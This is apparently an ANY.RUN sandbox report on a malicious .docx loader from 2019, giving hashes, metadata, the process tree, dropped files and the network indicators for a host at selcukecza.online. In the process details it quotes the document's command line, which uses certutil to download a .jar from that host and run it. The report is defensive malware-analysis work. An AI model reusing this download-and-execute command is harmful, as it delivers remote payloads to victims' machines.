analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

81b20145c1718d4847471aa76a0b15ccae756165839f1f9fbadd28fbb6120617.docx

Full analysis: https://app.any.run/tasks/c2d1041a-2ab3-4dbe-ba70-beba93949efe
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 17, 2019, 09:31:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

48BB9EB4DAC290653DB7F825C4C9149C

SHA1:

5D4611341FA168312CECC5D0238D0F68F79ED5F2

SHA256:

81B20145C1718D4847471AA76A0B15CCAE756165839F1F9FBADD28FBB6120617

SSDEEP:

384:FCL8CLJOGO2tuSB2Qc1FxvSzqsFYXkdAcSv6OPo0/JnQU/w9lilOwrflJHr5bzf+:2wsqGG/3/rBPDuaQzF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3356)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3356)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 2996)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3356)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3356)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0xb71a911e
ZipCompressedSize: 243
ZipUncompressedSize: 590
ZipFileName: _rels/.rels

XML

Template: Normal.dotm
TotalEditTime: 1 minute
Pages: 1
Words: 20
Characters: 117
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
Company: TESTER
LinksUpToDate: No
CharactersWithSpaces: 136
SharedDoc: No
HyperlinksChanged: No
AppVersion: 12
Keywords: -
LastModifiedBy: TESTER
RevisionNumber: 3
CreateDate: 2018:07:12 17:52:00Z
ModifyDate: 2018:07:12 20:11:00Z

XMP

Title: -
Subject: -
Creator: TESTER
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
3356"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\81b20145c1718d4847471aa76a0b15ccae756165839f1f9fbadd28fbb6120617.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2996c:\windows\system32\cmd.exe /c certutil -urlcache -split -f http://selcukecza.online/Resimlerim.jar && Resimlerim.jarc:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2149122452
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3424certutil -urlcache -split -f http://selcukecza.online/Resimlerim.jar C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2149122452
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 112
Read events
768
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
2
Unknown types
2

Dropped files

PID
Process
Filename
Type
3356WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD05F.tmp.cvr
MD5:
SHA256:
3356WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$b20145c1718d4847471aa76a0b15ccae756165839f1f9fbadd28fbb6120617.docxpgc
MD5:CDB450E4684715CC5D19B21B6CE0444F
SHA256:8861CC7012A432E70FAEB8795C75C69CC0BF48AEEE9236B750379EF1722250D4
3424certutil.exeC:\Users\admin\AppData\Local\Temp\Resimlerim.jarhtml
MD5:B6D52B881E4AFE023C3C564029079135
SHA256:A8752A7B79D86406301812934AF910F527D98493FE18BB9F681EB6DF6C0A04A6
3424certutil.exeC:\Users\admin\AppData\Local\Temp\Blob0_0.keyhtml
MD5:B6D52B881E4AFE023C3C564029079135
SHA256:A8752A7B79D86406301812934AF910F527D98493FE18BB9F681EB6DF6C0A04A6
3356WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:192891327D612AEA5767999BC0878E1D
SHA256:1DE8557EE4ACBA4F1219EA2BBFCB8E69FFFA53560A04088AD6395A8009091859
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3424
certutil.exe
GET
404
94.23.78.199:80
http://selcukecza.online/Resimlerim.jar
PT
html
9.86 Kb
malicious
3424
certutil.exe
GET
404
94.23.78.199:80
http://selcukecza.online/Resimlerim.jar
PT
html
9.86 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3424
certutil.exe
94.23.78.199:80
selcukecza.online
OVH SAS
PT
malicious

DNS requests

Domain
IP
Reputation
selcukecza.online
  • 94.23.78.199
malicious

Threats

PID
Process
Class
Message
3424
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
1 ETPRO signatures available at the full report
No debug info